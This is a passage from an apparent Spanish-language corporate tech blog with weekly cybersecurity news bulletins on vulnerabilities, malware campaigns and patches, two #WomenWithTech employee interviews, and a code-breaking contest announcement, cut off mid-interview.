Micro analiza la evolución del ecosistema cibercriminal de habla rusa, destacándolo como el más sofisticado y resiliente del panorama global. Este panorama se caracteriza por el uso de herramientas avanzadas, estrictas normas internas, mercados especializados y una cultura que favorece la colaboración entre actores maliciosos. Con raíces en una formación técnica sólida y una alta tolerancia al riesgo, estos grupos han ampliado sus operaciones a sectores como IoT, telecomunicaciones y Web3, aprovechando datos biométricos, redes sociales y deepfakes para estafas masivas. Asimismo, a pesar de que algunos foros prohíben hablar de ransomware, sus servicios asociados continúan activos. También se observa una creciente convergencia entre crimen físico y digital, y una participación mayor de actores alineados con intereses geopolíticos. Las tensiones derivadas de conflictos geopolíticos han modificado objetivos y alianzas, llegando incluso a dirigir sus ataques. El informe destaca la necesidad de adoptar marcos de gestión de exposición al riesgo (CREM) basados en inteligencia estratégica para anticiparse a estas amenazas. Más info Parcheado un fallo RCE en WhatsApp Desktop para Windows Facebook ha publicado y corregido una vulnerabilidad identificada en WhatsApp Desktop para Windows. El fallo, rastreado como CVE-2025-30401 (CVSSv3 de 6.7 de acuerdo con CISA), permitiría a los atacantes aprovechar metadatos de archivo no coincidentes para ejecutar código arbitrario (RCE) en sistemas vulnerables. La falla surge de un problema de suplantación de identidad en la forma en que WhatsApp gestiona los archivos adjuntos. La aplicación muestra los archivos adjuntos entrantes en función de su tipo MIME pero selecciona el gestor de apertura de archivos en función de la extensión del nombre del archivo adjunto. Este desajuste podría aprovecharse para crear un archivo aparentemente inofensivo pero que ejecute código malicioso al abrirlo. El fallo afecta a WhatsApp Desktop para Windows en todas las versiones anteriores a 2.2450.6. Los usuarios que utilizan WhatsApp para móviles o macOS no se encontrarían afectados. Se recomienda actualizar a la versión 2.2450.6 o posteriores para mitigar el fallo, además de evitar abrir archivos adjuntos de fuentes no fiables o sospechosas. Más info Cadena de suministro comprometida en GitHub Actions por token robado Palo Alto Networks ha revelado una compleja cadena de ataques que comprometió proyectos en GitHub Actions mediante un token de acceso personal (PAT) robado en diciembre de 2024. El ataque comenzó cuando un actor malicioso obtuvo acceso al token de un mantenedor del proyecto SpotBugs tras enviar un pull request malicioso que explotaba el trigger pull_request_target. En marzo de 2025, los atacantes usaron el token para otorgar acceso a un usuario falso al repositorio, permitiéndole introducir un workflow malicioso que exfiltraba datos cifrados. Esto afectó también al mantenedor de Reviewdog, cuya PAT permitió comprometer el repositorio reviewdog/action-setup, alterando la etiqueta v1 con código malicioso. El ataque se propagó a otros proyectos, incluyendo tj-actions/eslint-changed-files y tj-actions/changed-files, usados por miles de repositorios. Uno de los objetivos principales fue un proyecto open source de Coinbase, aunque el ataque se amplió tras fallar inicialmente. Se estima que unos 160.000 proyectos utilizaban la acción comprometida, aunque sólo se filtraron datos de 218 repositorios. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
11 de abril de 2025
Boletín Semanal de Ciberseguridad, 4 abril
Crocodilus: nuevo malware bancario dirigido a España y Turquía Investigadores de ThreatFabric han detectado un nuevo malware bancario dirigido a Android denominado Crocodilus y distribuido a través de un dropper propio que elude las protecciones de seguridad de Android 13 y posteriores. El malware integra ingeniería social para hacer que las víctimas proporcionen acceso a su frase semilla de cripto-monedero a través de una pantalla superpuesta desplegada cuando el usuario abre una aplicación bancaria. Esta advierte a los usuarios de hacer una copia de seguridad de la clave de su monedero para no perder el acceso a su cartera, permitiendo a Crocodilus recopilar el texto utilizando su registrador de accesibilidad. En sus primeras operaciones, Crocodilus se dirigía a usuarios de Turquía y España, siendo el malware de origen turco. El componente bot del malware admite un conjunto de 23 comandos que puede ejecutar en el dispositivo, entre los que se incluyen activar el desvío de llamadas, iniciar aplicaciones concretas, enviar y obtener SMS, publicar notificaciones push, bloquear la pantalla o solicitar privilegios de administrador del dispositivo. Asimismo, el malware ofrece funcionalidad de troyano de acceso remoto (RAT) y capturar códigos OTP. Más info Google y Mozilla lanzan actualizaciones críticas para sus navegadores Google y Mozilla publicaron nuevas versiones de sus navegadores, Chrome 135 y Firefox 137, respectivamente. Ambas actualizaciones corrigen múltiples vulnerabilidades, varias de ellas clasificadas como de alta gravedad. La versión 135 de Chrome soluciona un total de 14 vulnerabilidades, entre ellas un fallo de alta gravedad identificado como CVE-2025-3066 (CVSSv3 8.8 según CISA), relacionado con un use-after-free en Navigations. También se corrigieron fallos de gravedad media y baja, asociados con implementaciones inadecuadas en funciones como pestañas personalizadas, extensiones, autorrelleno y descargas. La nueva versión está disponible en 135.0.7049.52 para Linux y en 135.0.7049.41/42 para Windows y macOS. Por otro lado, Firefox 137 incorpora parches para ocho fallos, incluyendo tres considerados de alta gravedad. Entre ellos destaca un use-after-free relacionado con XSLTProcessor (CVE-2025-3028, CVSSv3 6.5 según CISA) y varios errores de seguridad de memoria que podrían permitir la ejecución de código malicioso (CVE-2025-3030 y CVE-2025-3034, ambos con un CVSSv3 de 8.1 según CISA). Además, se solucionaron vulnerabilidades que podrían facilitar la suplantación de la barra de direcciones, la exposición de información sensible y la carga de archivos arbitrarios en Windows. Mozilla también lanzó actualizaciones para sus versiones ESR y para Thunderbird, con correcciones similares. Finalmente, aunque no se ha informado que estas fallas estén siendo explotadas activamente, se recomienda a los usuarios actualizar sus navegadores lo antes posible. Más info Anubis: backdoor avanzado dirigido a dispositivos Windows Investigadores de PRODAFT han identificado Anubis, un sofisticado backdoor dirigido a sistemas Windows que permite a los atacantes obtener acceso persistente y ejecutar comandos remotos. Atribuido a un actor de amenazas con motivaciones financieras, Anubis emplea técnicas avanzadas de ofuscación y evasión para evitar su detección. El malware se distribuye a través de campañas de phishing y descargas maliciosas, utilizando servidores de comando y control (C2) para recibir instrucciones. Entre sus capacidades destacan la recopilación de credenciales, la manipulación del sistema de archivos y la instalación de payloads adicionales. El análisis de PRODAFT revela que Anubis ha sido empleado en ataques dirigidos contra organizaciones gubernamentales y del sector financiero. Se recomienda la aplicación de reglas de detección avanzadas y medidas de segmentación de red para mitigar su impacto. Más info Aumento de ataques de phishing mediante códigos QR Investigadores de Unit 42 de Palo Alto Networks han detectado un incremento en los ataques de phishing que utilizan códigos QR, una técnica conocida como quishing. Estos ataques buscan robar credenciales de cuentas Microsoft al explotar la confianza de los usuarios en los códigos QR y la menor seguridad en dispositivos móviles. A diferencia del phishing tradicional, el quishing evita los filtros de seguridad de los correos electrónicos al no incluir enlaces directos, sino códigos QR que redirigen a sitios maliciosos. Los atacantes emplean tácticas avanzadas como el uso de dominios legítimos para redirigir a víctimas y la integración de mecanismos de verificación humana para evadir detección. Las páginas de phishing suelen imitar servicios de Microsoft como SharePoint y pueden rellenar automáticamente el correo del usuario para aumentar su credibilidad. Entre los principales indicadores de compromiso se encuentran PDFs con códigos QR maliciosos, redirecciones a través de dominios legítimos y páginas de inicio de sesión falsas. Para mitigar estos ataques, se recomienda a las organizaciones implementar filtros de URL, reforzar la seguridad en dispositivos personales y entrenar a empleados en la identificación de intentos de quishing. Más info Expansión de operaciones de trabajadores de TI norcoreanos para infiltración y ciberdelincuencia Google Threat Intelligence Group ha identificado una expansión en las operaciones de trabajadores de TI norcoreanos que buscan empleo en empresas extranjeras para obtener acceso a infraestructura crítica y facilitar actividades de ciberdelincuencia y evasión de sanciones. Estos actores han aumentado la escala y sofisticación de sus tácticas, haciéndose pasar por desarrolladores legítimos en plataformas como GitHub y LinkedIn. Los trabajadores de TI norcoreanos han sido vinculados a la explotación de accesos privilegiados para el robo de propiedad intelectual, la implementación de malware y la recolección de credenciales. Además, han utilizado técnicas avanzadas para ocultar su verdadera identidad, incluyendo el uso de VPNs, deepfake en entrevistas y la manipulación de registros de actividad en plataformas colaborativas. Google alerta que estos actores también han diversificado sus objetivos, afectando sectores más allá de la industria tecnológica, como el financiero y el sanitario. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
4 de abril de 2025
Boletín Semanal de Ciberseguridad, 22-28 de marzo
Nueva vulnerabilidad 0-day en Windows expone credenciales NTLM Una nueva vulnerabilidad 0-day en Windows, descubierta por 0patch y detallada en su blog, permite a los atacantes robar credenciales NTLM engañando a los usuarios para que visualicen archivos .scf maliciosos en el Explorador de Windows. Esta falla afecta desde Windows 7 y Server 2008 R2 hasta las versiones más recientes, como Windows 11 v24H2 y Server 2025, y aún no cuenta con un identificador CVE. Aunque Microsoft no ha emitido un parche oficial, 0patch ha desarrollado microparches gratuitos que se aplican automáticamente sin necesidad de reiniciar, incluso en sistemas obsoletos. Esta vulnerabilidad se suma a otras recientes relacionadas con NTLM que Microsoft ha clasificado como wont fix; es decir, vulnerabilidades que no corregirá por decisión propia, ya sea por su bajo impacto, complejidad o porque afectan a versiones sin soporte. Por lo tanto, se recomienda a los usuarios considerar soluciones de terceros como 0patch para proteger sus sistemas, especialmente si utilizan versiones sin soporte, o deshabilitar funciones vulnerables si es posible. Más info IOCONTROL: Nuevo malware dirigido a infraestructuras críticas Investigadores de Flashpoint han identificado un nuevo malware atribuido al grupo hacktivista proiraní Cyber Av3ngers. IOCONTROL, diseñado para atacar sistemas IoT y OT, ha sido detectado en ataques contra infraestructuras de gestión de combustible en EE. UU. e Israel. En concreto, este malware utiliza técnicas avanzadas para evadir análisis, incluyendo empaquetado con UPX modificado y cifrado AES-256 para ocultar su dominio C2. Una vez desplegado, establece persistencia en el sistema, recolecta información y mantiene comunicación con su servidor de control a través del protocolo MQTT. Asimismo, los investigadores de Flashpoint habrían identificado a un presunto desarrollador ofreciendo IOCONTROL en foros clandestinos, lo que podría favorecer su proliferación en futuros ataques. Dada su sofisticación, se recomienda a las organizaciones fortalecer sus medidas de seguridad en entornos industriales. Más info Presunta brecha de datos: CloudSEK responde con nuevas evidencias tras las declaraciones de Oracle Actualmente, CloudSEK y Oracle están envueltos en una controversia respecto a una supuesta brecha de datos en la infraestructura en la nube de Oracle. Inicialmente, CloudSEK identificó que un actor malicioso, conocido como "rose87168", afirmó haber comprometido un endpoint de inicio de sesión único (SSO) de Oracle, obteniendo acceso a 6 millones de registros que incluían credenciales SSO y LDAP, claves OAuth2 e información de clientes. Oracle respondió negando categóricamente cualquier brecha de seguridad, asegurando que las credenciales divulgadas no estaban asociadas con Oracle Cloud y que ningún cliente se vio afectado. Sin embargo, CloudSEK presentó evidencia adicional que, según ellos, confirma la intrusión y destaca la necesidad de transparencia y colaboración en materia de ciberseguridad. Sus investigadores rastrearon la actividad del atacante hasta un endpoint de producción comprometido (login.us2.oraclecloud.com), utilizado para autenticar solicitudes API mediante tokens OAuth2. Además, CloudSEK verificó que varios dominios proporcionados por el atacante correspondían a clientes reales de Oracle Cloud. Más info Corregido un fallo 0-day en Chrome activamente explotado Google ha corregido un fallo 0-day de alta gravedad en Chrome, el cual ha sido explotado activamente por actores maliciosos en ataques de espionaje. Google solucionó el fallo para los usuarios del canal Stable Desktop, y las versiones parcheadas se distribuyeron en todo el mundo a los usuarios de Windows (134.0.6998.178). Por otro lado, investigadores de Kaspersky describieron la vulnerabilidad como un manejo incorrecto proporcionado en circunstancias no especificadas en Mojo en Windows. La falla se está empleando en ataques de phishing como parte de una campaña de ciberespionaje dirigida a organizaciones rusas y bautizada como Operation ForumTroll. La campaña se dirige específicamente a medios de comunicación, instituciones educativas y organizaciones gubernamentales del país. Los atacantes utilizan los exploits CVE-2025-2783 para eludir las protecciones sandbox de Chrome e infectar objetivos con malware sofisticado. Asimismo, se utilizaba un segundo exploit que permitía la ejecución remota de código en los sistemas comprometidos. No obstante, parchear Chrome desactivaría toda la cadena de exploits, bloqueando posibles ataques. Más info EncryptHub aprovecha CVE-2025-26633 en sus ataques Un informe de Trend Micro revela que el actor de amenazas EncryptHub, también conocido como Larva-208 o Water Gamayun, ha explotado en sus ataques la vulnerabilidad CVE-2025-26633 (CVSSv3 de 7.0 de acuerdo con Microsoft), un problema 0-day de elusión de funciones de seguridad de la consola de gestión de Microsoft. EncryptHub ha desarrollado una técnica para aprovecharse de la falla, la cual Trend Micro ha nombrado como MSC EvilTwin, que consiste en manipular archivos .msc y la ruta de la Interfaz de Usuario Multilingüe (MUIPath) para descargar y ejecutar cargas útiles maliciosas, dado que el usuario no recibe una advertencia antes de cargar archivos MSC inesperados en dispositivos sin parches. En los ataques, EncryptHub ha implementado múltiples familias de malware como la puerta trasera SilentPrism, o los infostealers Stealc y Rhadamanthys. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
28 de marzo de 2025
Boletín Semanal de Ciberseguridad, 15-21 marzo
Descubierta una vulnerabilidad en Windows explotada desde 2017 Investigadores de Trend Micro han publicado un análisis sobre el fallo ZDI-CAN-25373 en Windows, que habría sido explotado por al menos 11 grupos de actores de amenazas patrocinados por estados como China, Rusia, Irán y Corea del Norte desde 2017. El fallo, basado en una debilidad de la interfaz de usuario, permite ocultar argumentos maliciosos de línea de comandos en archivos de acceso directo (.lnk), facilitando la ejecución de código sin ser detectado. Asimismo, los investigadores han destacado que los ataques habrían sido principalmente dirigidos contra entidades en Norteamérica, Europa, Asia Oriental y Australia, con un 70% de los casos vinculados a ciberespionaje. Entre los grupos que habrían explotado el fallo en sus ataques se incluyen Water Asena (Evil Corp), Earth Kumiho (Kimsuky) y Earth Imp (Konni). Microsoft habría rechazado lanzar un parche inmediato, argumentando que el fallo no cumpliría con el umbral de servicio, si bien podría abordarlo en futuras actualizaciones. Más info MirrorFace amplía su alcance más allá de Japón con Operation Akairyu El grupo de ciberespionaje MirrorFace, vinculado a China, ha expandido sus operaciones más allá de Japón, apuntando ahora a entidades en Europa y otras regiones en el contexto de la Expo 2025. Según ESET, la campaña denominada "Operation Akairyu" ha reintroducido la backdoor ANEL, una herramienta previamente utilizada por MirrorFace para mantener acceso persistente en los sistemas comprometidos. El grupo ha empleado técnicas avanzadas de spear phishing para distribuir malware, con señuelos relacionados con la exposición internacional. Una vez dentro de los sistemas, los atacantes utilizan ANEL para el control remoto, exfiltración de datos y despliegue de cargas adicionales. Esta expansión indica un interés estratégico en sectores gubernamentales, tecnológicos y diplomáticos fuera de Asia. Más info Detectado un nuevo malware IIS basado en C++ y que imita a cmd.exe Investigadores de Unit42 han detectado un nuevo malware dirigido a servidores de Internet Information Services (IIS). El malware, desarrollado en C++/CLI y que actualmente cuenta con dos versiones, funciona como una puerta trasera pasiva, integrándose en el servidor IIS mediante el registro de eventos de respuesta HTTP. Este filtra las peticiones HTTP entrantes en busca de cabeceras específicas que se utilizan para ejecutar comandos. Los comandos y los datos se cifran mediante AES y se codifican posteriormente en Base64. La versión más reciente, compilada en mayo de 2023, emplea una herramienta de envoltura cmd.exe personalizada para ejecutar comandos e incrustada dentro del malware, el cual también sería capaz de parchear rutinas AMSI y ETW para eludir la detección. Su sofisticación y naturaleza selectiva sugieren que puede haber sido empleado en ataques específicos, si bien la atribución a un actor de amenazas conocido no se ha producido por el momento. Más info Vulnerabilidades críticas en SCADA myPRO permiten ejecución remota de código Investigadores de Catalyst han descubierto dos fallos críticos en mySCADA myPRO, un sistema SCADA utilizado en entornos de tecnología operativa (OT). Ambos, identificados como CVE-2025-20014 y CVE-2025-20061, tienen una puntuación CVSSv4 de 9.3 según ICS-CERT y permiten la inyección de comandos en el sistema a través de peticiones POST manipuladas debido a una inadecuada sanitización de entradas de usuario. Si son explotadas, los atacantes podrían ejecutar código arbitrario y tomar control de redes industriales, causando interrupciones operativas y pérdidas económicas. Las vulnerabilidades han sido corregidas en las versiones mySCADA PRO Manager 1.3 y mySCADA PRO Runtime 9.2.1. Se recomienda aplicar los parches de seguridad, segmentar redes SCADA, reforzar autenticación y monitorizar actividad sospechosa. Más info Nuevo ataque BitM permite el robo de sesiones protegidas con MFA Investigadores de Mandiant han identificado un nuevo ataque denominado Browser in the Middle (BitM), que permite a los atacantes robar sesiones autenticadas sin necesidad de conocer credenciales o superar desafíos de autenticación multifactor (MFA). A diferencia de métodos tradicionales como Evilginx2, un proxy transparente en el que el servidor de un operador de red team actúa como intermediario entre la víctima y el servicio objetivo, BitM usa un navegador controlado por el atacante para capturar directamente la sesión de la víctima. Esta técnica permite comprometer cuentas en cuestión de segundos, facilitando ataques a gran escala. Para mitigar estos riesgos, los investigadores recomiendan la implementación de certificados de cliente y MFA basado en hardware con FIDO2, ya que estos mecanismos dificultan la suplantación de sesiones incluso si el atacante logra acceder a las credenciales del usuario. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
21 de marzo de 2025
#WomenWithTech: Angy Benavides y la tecnología como puerta hacia el futuro
Soy Angy Benavides, ingeniera en telecomunicaciones de la Universidad Tecnológica del Perú y jefa de proyecto en Telefónica Tech. Siempre he sido curiosa y apasionada por la tecnología, buscando entender cómo funciona todo. Disfruto del aire libre, practico deportes y leo sobre las últimas tendencias tecnológicas. ______ Cuéntanos un poco sobre ti: ¿quién eres y a qué te dedicas? Soy Angy Benavides, ingeniera en telecomunicaciones y, actualmente, jefa de proyecto en Telefónica Tech. Me encargo de gestionar proyectos de implantación de soluciones en la nube, y me siento afortunada de poder liderar equipos que transforman la manera en que las empresas acceden a la tecnología. Para mí la tecnología es una puerta abierta al futuro, y mi trabajo consiste en asegurar que esa puerta se mantenga abierta y accesible para todos. ¿Tenías claro que querías dedicarte al mundo de la tecnología desde pequeña? ¿Ha sido algo vocacional? Desde pequeña siempre me han fascinado los aparatos electrónicos. No era algo que tuviera planeado, pero la curiosidad por entender cómo funcionaban las cosas creció conmigo. A medida que crecía, me di cuenta de que la tecnología no era solo una pasión, sino una forma de generar un impacto real en la vida de las personas. Fue en ese momento cuando decidí que quería ser parte de ese mundo. No solo como espectadora, sino como creadora de soluciones. Mi pasión por la tecnología comenzó con la curiosidad por entender cómo funcionan las cosas. ¿Quién te motivó a escoger una profesión relacionada con la tecnología? No hubo una sola persona, sino una serie de experiencias y momentos que me llevaron a este camino. Desde ver a mujeres exitosas en el sector, hasta escuchar de mentores que la tecnología tenía un poder transformador en la sociedad. La idea de poder crear algo que no solo mejorara procesos, sino que también tuviera un impacto positivo en la vida cotidiana, me atrajo profundamente. ¿Cómo describirías tu trayectoria profesional hasta ahora y cuáles son las habilidades que utilizas en Telefónica Tech? Mi trayectoria ha sido un recorrido de constante aprendizaje. Empecé con un enfoque técnico, y con el tiempo fui tomando roles que implicaban liderazgo y gestión de proyectos. Las habilidades que más utilizo son la capacidad de liderar equipos, la comunicación efectiva, la toma de decisiones estratégicas y, por supuesto, la adaptabilidad. La tecnología cambia rápidamente, y es esencial mantenerse al día con las nuevas tendencias para brindar soluciones innovadoras. Las experiencias y momentos inspiradores me llevaron a escoger una profesión tecnológica. ¿Cómo concilias tu puesto de alta responsabilidad con tu vida personal? Es un desafío constante, pero he aprendido que la clave está en la organización y en reconocer la importancia de priorizar lo que realmente importa. La flexibilidad en el trabajo y el apoyo de mi equipo en Telefónica Tech son fundamentales para poder equilibrar mi vida profesional con mi vida personal. Creo que, para ser verdaderamente eficaz en el trabajo, es esencial también cuidar de uno mismo, mantener la curiosidad y el equilibrio emocional. ¿Cómo promueve Telefónica Tech la diversidad de género y la inclusión? Telefónica Tech fomenta una cultura inclusiva, donde las mujeres no solo ocupan puestos importantes, sino que somos parte activa de la toma de decisiones. Las políticas de diversidad de género y la inclusión son parte fundamental de su estrategia. La empresa ofrece programas de desarrollo profesional, mentoría y apoyo continuo a las mujeres en el sector tecnológico. Aquí, no importa tu género, sino lo que eres capaz de aportar. La clave para conciliar la responsabilidad laboral con la vida personal está en la organización y priorización. ¿Qué significa para ti la iniciativa #WomenWithTech? Para mí, #WomenWithTech es un símbolo de visibilidad y fuerza para las mujeres en la tecnología. Es un espacio donde compartimos nuestras historias, desafíos y éxitos, mostrando al mundo que las mujeres no solo estamos aquí, sino que estamos liderando el camino. Esta iniciativa no solo empodera, sino que también inspira a futuras generaciones a que sigan sus pasiones, sin importar los obstáculos que puedan encontrar. Angy gestiona la integración de soluciones Cloud en Telefónica Tech Perú. #WomenWithTech empodera y visibiliza a las mujeres en tecnología, inspirando a futuras generaciones. ¿Qué aportamos las mujeres a las profesiones STEAM? Las mujeres aportamos un enfoque diverso, una manera distinta de abordar problemas y soluciones. No se trata solo de diferencias de género, sino de cómo esas diferencias enriquecen el trabajo colectivo. Las mujeres tenemos una habilidad especial para equilibrar la creatividad y la lógica, y en las profesiones STEAM, ese balance es fundamental para generar soluciones más inclusivas y pensadas para todos. ¿Qué consejo darías a otras mujeres que desean seguir una carrera STEAM y qué habilidades crees que son importantes para tener éxito en el sector de la tecnología? Mi consejo es que no dejen que las dudas las detengan. La tecnología es un campo sin límites, y las mujeres tienen mucho que aportar. Es importante ser persistente, mantener siempre una actitud de aprendizaje y, sobre todo, rodearse de personas que las inspiren. Las habilidades técnicas son esenciales, pero también lo son las habilidades interpersonales, como la colaboración, la comunicación efectiva y la gestión del tiempo. Y, sobre todo, creer en lo que uno puede lograr, incluso cuando el camino parece incierto. Que las dudas no te detengan. La tecnología es un campo sin límites y las mujeres tenemos mucho que aportar.
20 de marzo de 2025
Cyber Tech Games: ¡descifra el código secreto!
¿Tienes lo que se necesita para descifrar un mensaje oculto? Es hora de poner a prueba tu ingenio y habilidades con nuestro I Cyber Tech Games. Se trata de un desafío donde cada detalle cuenta y solo los más perspicaces podrán descifrar el mensaje oculto y hacerse con el premio. El reto es simple en concepto, pero desafiante en ejecución. El punto de partida es esta imagen cargada de pistas, claves y enigmas ocultos a plena vista. Haz clic en la imagen para descargar el archivo de la competición. El hash MD5 es 435b0a90964b5ea0b638244d557a0229. Tu misión es analizarla minuciosamente, extraer información y seguir una serie de pasos lógicos para revelar el mensaje cifrado en un tiempo limitado. Si dominas las pistas desbloquearás los secretos que te llevarán al premio final. Pero hay un detalle importante: solo tienes 48 horas para completar el reto. Premio para el más rápido El desafío no solo es sobre rapidez, también es sobre habilidad y capacidad para resolver problemas. El primer jugador en descifrar el código recibirá una tarjeta Amazon de 100€. ¿Cómo participar? No necesitas inscribirte ni registrarte para participar. Solo tienes que resolver el caso, consultar las bases legales y enviar el resultado antes del viernes 21 a las 10 am CET por correo electrónico. ✅ Actualizado viernes 21, 10 am: Gracias a todos los que habéis participado y enhorabuena al ganador. ¡Nos vemos en el próximo Cyber Tech Games!
19 de marzo de 2025
Boletín Semanal de Ciberseguridad, 8 - 14 marzo
Microsoft corrige 57 fallos, 7 de ellos zero-day, en su Patch Tuesday Microsoft ha publicado su Patch Tuesday de marzo de 2025 corrigiendo 57 fallos de seguridad, incluyendo 6 vulnerabilidades 0-day activamente explotadas y un fallo 0-day adicional públicamente expuesto. Entre estos, 23 se corresponderían con vulnerabilidades de ejecución remota de código (RCE), 6 de ellas críticas. Con respecto a los 0-day, se corresponden con CVE-2025-24983, el cual permite a los atacantes locales obtener privilegios SYSTEM en el dispositivo; CVE-2025-24984 y CVE-2025-24991, ambos fallos de divulgación de información NTFS de Windows; CVE-2025-24985, falla RCE del controlador del sistema de archivos Windows Fast FAT; CVE-2025-24993, también un fallo RCE, si bien de Windows NTFS; y CVE-2025-26633, una vulnerabilidad de elusión de funciones de seguridad de la consola de gestión de Microsoft. Por su parte, el fallo 0-day públicamente divulgada se corresponde con la vulnerabilidad de ejecución remota de código en Microsoft Access CVE-2025-26630. Más info SideWinder intensifica sus ataques a infraestructuras marítimas y nucleares El grupo APT SideWinder ha ampliado sus ataques a sectores estratégicos como infraestructuras marítimas y energéticas, con un creciente interés en la industria nuclear del sur de Asia. De acuerdo con un informe publicado por Secure List, a lo largo de 2024 sus operaciones se han extendido a nuevas regiones, incluyendo Egipto y varios países africanos. La campaña detectada se basa en correos de phishing con documentos maliciosos que explotan la vulnerabilidad CVE-2017-11882 (CVSSv3 de 7.8) para desplegar el malware Backdoor Loader y el implante de espionaje StealerBot. SideWinder destaca por actualizar constantemente su arsenal para evadir detección, modificando su código en cuestión de horas. Las entidades más afectadas incluyen gobiernos, ministerios, empresas de logística y telecomunicaciones. Más info Strela Stealer se dirige a clientes de correo en Europa Trustwave ha identificado una nueva campaña de Strela Stealer, un infostealer activo desde 2022 que roba credenciales de correo electrónico en sistemas con Mozilla Thunderbird y Microsoft Outlook. Este malware ha sido distribuido mediante campañas de phishing en países europeos como España, Alemania, Italia y Ucrania. Recientemente, los atacantes han comenzado a reenviar correos legítimos con facturas falsas que incluyen un archivo ZIP con el loader del malware. De acuerdo con los investigadores, Strela Stealer es operado por el grupo Hive0145 y utiliza infraestructura de alojamiento ruso para evadir la detección. Su código está altamente ofuscado y emplea técnicas avanzadas como la manipulación de fibras y el análisis del entorno del sistema para dificultar su análisis. Más info Vulnerabilidad crítica en PHP-CGI con explotación global La vulnerabilidad CVE-2024-4577 (CVSSv3 9.8, según PHP Group), que afecta a servidores web que ejecutan PHP y que inicialmente fue explotada en ataques contra organizaciones japonesas, ahora representa una amenaza global, advirtieron investigadores. Cisco Talos y GreyNoise han observado intentos de ataque en varias regiones, incluidas EE. UU., Singapur, Japón, Reino Unido y España, destacando la necesidad de una acción inmediata. La falla afecta la configuración PHP-CGI en servidores web y ha sido utilizada para robar credenciales y establecer persistencia en los sistemas. Aunque se lanzó un parche a mediados de 2024, GreyNoise identificó 79 formas de explotación para aprovechar la vulnerabilidad y ejecutar código de forma remota en un sistema infectado, lo que sugiere un patrón de ataque en expansión. Symantec también informó sobre su uso en agosto de 2024 contra una universidad taiwanesa. Más info Campaña de Blind Eagle contra el gobierno colombiano Blind Eagle, un grupo APT activo desde 2018, ha dirigido ciberataques contra instituciones gubernamentales, del sector judicial, infraestructuras críticas y otras organizaciones privadas en Colombia. Según una investigación de Check Point Research, este grupo ha utilizado una variante de la vulnerabilidad CVE-2024-43451 para comprometer a más de 1.600 víctimas en una sola campaña a finales de 2024. Blind Eagle, que se ha observado en ataques a otros países de Latinoamérica, emplea sofisticadas tácticas de ingeniería social para obtener acceso a los sistemas objetivo. Sus ataques recientes se han basado en archivos .url que, al interactuar con ellos, activan la descarga y ejecución de malware, incluidos troyanos de acceso remoto como NjRAT, AsyncRAT y Remcos. La explotación de plataformas legítimas de intercambio de archivos como Google Drive y Dropbox les ha permitido evadir las medidas de seguridad tradicionales. Aunque Microsoft publicó un parche para CVE-2024-43451, Blind Eagle se adaptó rápidamente, introduciendo una variante del exploit en solo seis días. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
14 de marzo de 2025
#WomenWithTech: La influencia de la ciencia ficción en la carrera profesional de Orlany Carrillo
Orlany es una persona disciplinada, con gran capacidad de adaptación y empática. Ha estudiado ingeniería en telecomunicaciones y ha complementado su carrera con diplomados en tecnologías de la información y desarrollo de productos y servicios. En su vida diaria, le apasiona el deporte, viajar y es amante de los perros. ______ Cuéntanos un poco sobre ti: ¿quién eres y a qué te dedicas? Soy Orlany Carrillo y desde 2024 formo parte del equipo de IoT y Conectividad de Telefónica Tech en Chile. Me desempeño en el equipo comercial, como especialista de ventas M2M, con enfoque en IoT Partners Program (IPP) en Chile. Cuando eras pequeña, ¿imaginabas que acabarías trabajando en una empresa tecnológica? Cuando era muy pequeña mi sueño era ser veterinaria, porque siempre he amado a los animales. Sin embargo, a medida que fui creciendo, influenciada por las películas de ciencia ficción que compartía con mi padre, fui desarrollando el gusto por la tecnología. Así fue como comencé a soñar con formar parte de una empresa líder en ello. De pequeña Orlany quería ser veterinaria. ¿Qué aporta tu rol en Sales a una empresa tecnológica como es Telefónica Tech? Pienso que el área de ventas es la puerta de entrada de Telefónica Tech hacia nuestros clientes. De alguna manera, somos la imagen de la empresa y representantes de esta. Debemos estar preparados para enfrentar los desafíos de la industria y sus cambios, además de ser expertos, en los productos y servicios que ofrecemos, a fin de generar nuevas oportunidades de negocio y ser referentes en el sector. En el área de ventas somos la imagen de la empresa y representantes de esta. ¿Cómo describirías tu trayectoria profesional hasta ahora y cuáles son las habilidades que utilizas en Telefónica Tech? Mi trayectoria profesional se ha caracterizado por el aprendizaje continuo y la adaptación al cambio. He tenido la oportunidad de trabajar en diferentes áreas como operaciones, proyectos, postventa B2B y, ahora, ventas. Este recorrido ha sido valioso porque me ha permitido adquirir conocimientos y habilidades que puedo poner en práctica a diario, tales como la flexibilidad, comunicación, experiencia y orientación al cliente. Mi trayectoria profesional ha abarcado áreas como operaciones, proyectos, postventa B2B y ventas. ¿Cómo concilias tu puesto de alta responsabilidad con tu vida personal? La empresa promueve la flexibilidad y la desconexión digital, lo cual es una gran ventaja en estos tiempos donde estamos hiperconectados a través de los medios digitales. Particularmente, siempre realizo alguna actividad extra como salir en bici, ir a alguna clase deportiva, pasear con mis perros, etc. Esto me permite despejar la mente y mantener mi estado de salud físico y mental. ¿Cómo promueve Telefónica Tech la diversidad de género y la inclusión? Yo creo que Telefónica Tech es un lugar donde se promueve la participación de las mujeres en el mundo de la tecnología desde diferentes roles, permitiendo que cada una pueda aportar con ideas y con su experiencia e incluso desarrollar su liderazgo. De igual manera, puedo decir que existe participación equitativa para todos sin importar género, creencias o nacionalidad. Lo dice una venezolana que trabaja en Chile. Telefónica Tech promueve la diversidad de género y la inclusión, permitiendo una participación equitativa sin importar género, creencias o nacionalidad. ¿Qué significa para ti la iniciativa #WomenWithTech? La iniciativa #WomenWithTech significa para mí inspiración. Considero que es importante poder mostrar, a las generaciones que están en formación, que las mujeres podemos ser parte activa del mundo de la tecnología y que no es algo ajeno a nuestro género. Y qué mejor manera de evidenciarlo que dando a 